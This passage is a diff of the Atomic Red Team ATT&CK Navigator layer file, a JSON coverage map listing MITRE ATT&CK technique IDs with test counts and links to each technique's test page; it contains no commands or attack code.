Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":44,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1056","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View 